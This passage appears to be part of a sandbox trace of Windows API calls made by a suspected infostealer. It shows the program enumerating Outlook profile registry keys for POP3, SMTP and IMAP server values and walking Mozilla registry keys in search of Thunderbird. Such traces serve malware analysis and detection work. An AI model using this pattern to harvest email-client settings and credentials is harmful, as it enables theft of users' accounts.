Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.929] lstrlenW (lpString="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned 123 [0163.929] lstrlenW (lpString="00000004") returned 8 [0163.929] GetProcessHeap () returned 0x8e0000 [0163.929] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x108) returned 0x9252c8 [0163.929] lstrcatW (in: lpString1="", lpString2="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\" [0163.930] lstrcatW (in: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\", lpString2="00000004" | out: lpString1="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004") returned="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004" [0163.930] VirtualQuery (in: lpAddress=0x926360, lpBuffer=0x2dea94, dwLength=0x1c | out: lpBuffer=0x2dea94*(BaseAddress=0x926000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.930] GetProcessHeap () returned 0x8e0000 [0163.930] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x926360 | out: hHeap=0x8e0000) returned 1 [0163.930] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.930] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.930] RegCloseKey (hKey=0x14c) returned 0x0 [0163.930] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.930] RegQueryValueExW (in: hKey=0x14c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.930] RegCloseKey (hKey=0x14c) returned 0x0 [0163.930] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.930] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.930] RegCloseKey (hKey=0x14c) returned 0x0 [0163.930] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.930] RegQueryValueExW (in: hKey=0x14c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.930] RegCloseKey (hKey=0x14c) returned 0x0 [0163.930] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dea88 | out: phkResult=0x2dea88*=0x14c) returned 0x0 [0163.931] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea8c, lpData=0x0, lpcbData=0x2dea98*=0x0 | out: lpType=0x2dea8c*=0x0, lpData=0x0, lpcbData=0x2dea98*=0x0) returned 0x2 [0163.931] RegCloseKey (hKey=0x14c) returned 0x0 [0163.931] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dea60 | out: phkResult=0x2dea60*=0x14c) returned 0x0 [0163.931] RegQueryValueExW (in: hKey=0x14c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x2dea64, lpData=0x0, lpcbData=0x2dea70*=0x0 | out: lpType=0x2dea64*=0x0, lpData=0x0, lpcbData=0x2dea70*=0x0) returned 0x2 [0163.931] RegCloseKey (hKey=0x14c) returned 0x0 [0163.931] VirtualQuery (in: lpAddress=0x9252c8, lpBuffer=0x2deaa0, dwLength=0x1c | out: lpBuffer=0x2deaa0*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.931] GetProcessHeap () returned 0x8e0000 [0163.931] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9252c8 | out: hHeap=0x8e0000) returned 1 [0163.931] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x4, lpName=0x2deae0, lpcchName=0x2deadc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000004", lpcchName=0x2deadc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0163.931] RegCloseKey (hKey=0x100) returned 0x0 [0163.931] _alloca_probe () returned 0x73846 [0163.931] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x2dead8 | out: phkResult=0x2dead8*=0x0) returned 0x2 [0163.931] _alloca_probe () returned 0x73846 [0163.931] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x2dead8 | out: phkResult=0x2dead8*=0x0) returned 0x2 [0163.931] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.931] IStream:SetSize (This=0x9043c0, libNewSize=0x2ff) returned 0x0 [0163.932] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x2ff, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0163.932] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0163.932] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0163.932] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0163.932] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0xa, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.932] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0163.932] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Thunderbird") returned 0x0 [0163.932] GetProcessHeap () returned 0x8e0000 [0163.932] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x910b70 [0163.932] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla", phkResult=0x2dfab8 | out: phkResult=0x2dfab8*=0x100) returned 0x0 [0163.932] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x0, lpName=0x910b70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0163.932] lstrlenW (lpString="Software\\Mozilla") returned 16 [0163.932] lstrlenW (lpString="\\") returned 1 [0163.932] GetProcessHeap () returned 0x8e0000 [0163.932] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903bd8 [0163.932] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0163.932] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0163.932] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0163.932] lstrlenW (lpString="Firefox") returned 7 [0163.932] GetProcessHeap () returned 0x8e0000 [0163.932] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0163.932] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0163.932] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0163.932] VirtualQuery (in: lpAddress=0x903bd8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0163.933] GetProcessHeap () returned 0x8e0000 [0163.933] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903bd8 | out: hHeap=0x8e0000) returned 1 [0163.933] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Thunderbird") returned 0x0 [0163.933] GetProcessHeap () returned 0x8e0000 [0163.933] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b80 [0163.933] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x14c) returned 0x0 [0163.933] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Crash Reporter", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0163.933] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0163.933] lstrlenW (lpString="\\") returned 1 [0163.933] GetProcessHeap () returned 0x8e0000 [0163.933] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a80 [0163.933] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0163.933] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0163.933] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0163.933] lstrlenW (lpString="Crash Reporter") returned 14 [0163.933] GetProcessHeap () returned 0x8e0000 [0163.933] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x50) returned 0x90b458 [0164.037] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0164.037] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="Crash Reporter" | out: lpString1="Software\\Mozilla\\Firefox\\Crash Reporter") returned="Software\\Mozilla\\Firefox\\Crash Reporter" [0164.037] VirtualQuery (in: lpAddress=0x8f9a80, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.037] GetProcessHeap () returned 0x8e0000 [0164.037] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a80 | out: hHeap=0x8e0000) returned 1 [0164.037] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\Crash Reporter", lpSrch="Thunderbird") returned 0x0 [0164.037] GetProcessHeap () returned 0x8e0000 [0164.037] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x913b88 [0164.037] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x15c) returned 0x0 [0164.037] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.037] RegCloseKey (hKey=0x15c) returned 0x0 [0164.037] VirtualQuery (in: lpAddress=0x913b88, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x913000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.037] GetProcessHeap () returned 0x8e0000 [0164.037] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x913b88 | out: hHeap=0x8e0000) returned 1 [0164.037] VirtualQuery (in: lpAddress=0x90b458, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x90b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.037] GetProcessHeap () returned 0x8e0000 [0164.037] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x90b458 | out: hHeap=0x8e0000) returned 1 [0164.037] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x1, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.037] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0164.037] lstrlenW (lpString="\\") returned 1 [0164.037] GetProcessHeap () returned 0x8e0000 [0164.037] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a80 [0164.037] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0164.037] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0164.038] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0164.038] lstrlenW (lpString="TaskBarIDs") returned 10 [0164.038] GetProcessHeap () returned 0x8e0000 [0164.038] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x900390 [0164.038] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0164.038] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="TaskBarIDs" | out: lpString1="Software\\Mozilla\\Firefox\\TaskBarIDs") returned="Software\\Mozilla\\Firefox\\TaskBarIDs" [0164.038] VirtualQuery (in: lpAddress=0x8f9a80, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.038] GetProcessHeap () returned 0x8e0000 [0164.038] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a80 | out: hHeap=0x8e0000) returned 1 [0164.038] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Thunderbird") returned 0x0 [0164.038] GetProcessHeap () returned 0x8e0000 [0164.038] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x913b88 [0164.038] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x15c) returned 0x0 [0164.038] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.038] RegCloseKey (hKey=0x15c) returned 0x0 [0164.038] VirtualQuery (in: lpAddress=0x913b88, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x913000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.038] GetProcessHeap () returned 0x8e0000 [0164.038] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x913b88 | out: hHeap=0x8e0000) returned 1 [0164.038] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.038] GetProcessHeap () returned 0x8e0000 [0164.038] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0164.038] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x2, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.038] RegCloseKey (hKey=0x14c) returned 0x0 [0164.038] VirtualQuery (in: lpAddress=0x912b80, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x912000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x15000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.038] GetProcessHeap () returned 0x8e0000 [0164.038] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x912b80 | out: hHeap=0x8e0000) returned 1 [0164.038] VirtualQuery (in: lpAddress=0x8f9a40, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.038] GetProcessHeap () returned 0x8e0000 [0164.039] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a40 | out: hHeap=0x8e0000) returned 1 [0164.039] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x1, lpName=0x910b70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.039] RegCloseKey (hKey=0x100) returned 0x0 [0164.039] VirtualQuery (in: lpAddress=0x910b70, lpBuffer=0x2dfa7c, dwLength=0x1c | out: lpBuffer=0x2dfa7c*(BaseAddress=0x910000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x17000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.039] GetProcessHeap () returned 0x8e0000 [0164.039] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x910b70 | out: hHeap=0x8e0000) returned 1 [0164.039] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Thunderbird") returned 0x0 [0164.039] GetProcessHeap () returned 0x8e0000 [0164.039] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x910b70 [0164.039] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla", phkResult=0x2dfab8 | out: phkResult=0x2dfab8*=0x100) returned 0x0 [0164.039] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x0, lpName=0x910b70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.039] lstrlenW (lpString="Software\\Mozilla") returned 16 [0164.039] lstrlenW (lpString="\\") returned 1 [0164.039] GetProcessHeap () returned 0x8e0000 [0164.039] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903bd8 [0164.039] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0164.039] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0164.039] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0164.039] lstrlenW (lpString="Firefox") returned 7 [0164.039] GetProcessHeap () returned 0x8e0000 [0164.039] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0164.039] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0164.039] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0164.039] VirtualQuery (in: lpAddress=0x903bd8, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.039] GetProcessHeap () returned 0x8e0000 [0164.039] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903bd8 | out: hHeap=0x8e0000) returned 1 [0164.039] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Thunderbird") returned 0x0 [0164.039] GetProcessHeap () returned 0x8e0000 [0164.039] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x912b80 [0164.040] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x14c) returned 0x0 [0164.040] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x0, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0164.040] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0164.040] lstrlenW (lpString="\\") returned 1 [0164.040] GetProcessHeap () returned 0x8e0000 [0164.040] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a80 [0164.040] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0164.040] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0164.040] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0164.040] lstrlenW (lpString="TaskBarIDs") returned 10 [0164.040] GetProcessHeap () returned 0x8e0000 [0164.040] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x48) returned 0x900390 [0164.040] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0164.040] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="TaskBarIDs" | out: lpString1="Software\\Mozilla\\Firefox\\TaskBarIDs") returned="Software\\Mozilla\\Firefox\\TaskBarIDs" [0164.040] VirtualQuery (in: lpAddress=0x8f9a80, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.040] GetProcessHeap () returned 0x8e0000 [0164.040] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a80 | out: hHeap=0x8e0000) returned 1 [0164.040] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Thunderbird") returned 0x0 [0164.040] GetProcessHeap () returned 0x8e0000 [0164.040] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x913b88 [0164.040] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x2dfa48 | out: phkResult=0x2dfa48*=0x15c) returned 0x0 [0164.040] RegEnumKeyExW (in: hKey=0x15c, dwIndex=0x0, lpName=0x913b88, lpcchName=0x2dfa44, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x2dfa44, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.040] RegCloseKey (hKey=0x15c) returned 0x0 [0164.040] VirtualQuery (in: lpAddress=0x913b88, lpBuffer=0x2dfa0c, dwLength=0x1c | out: lpBuffer=0x2dfa0c*(BaseAddress=0x913000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x14000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.040] GetProcessHeap () returned 0x8e0000 [0164.040] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x913b88 | out: hHeap=0x8e0000) returned 1 [0164.041] VirtualQuery (in: lpAddress=0x900390, lpBuffer=0x2dfa44, dwLength=0x1c | out: lpBuffer=0x2dfa44*(BaseAddress=0x900000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x27000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0164.041] GetProcessHeap () returned 0x8e0000 [0164.041] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x900390 | out: hHeap=0x8e0000) returned 1 [0164.041] RegEnumKeyExW (in: hKey=0x14c, dwIndex=0x1, lpName=0x912b80, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0164.041] RegCloseKey (hKey=0x14c) returned 0x0 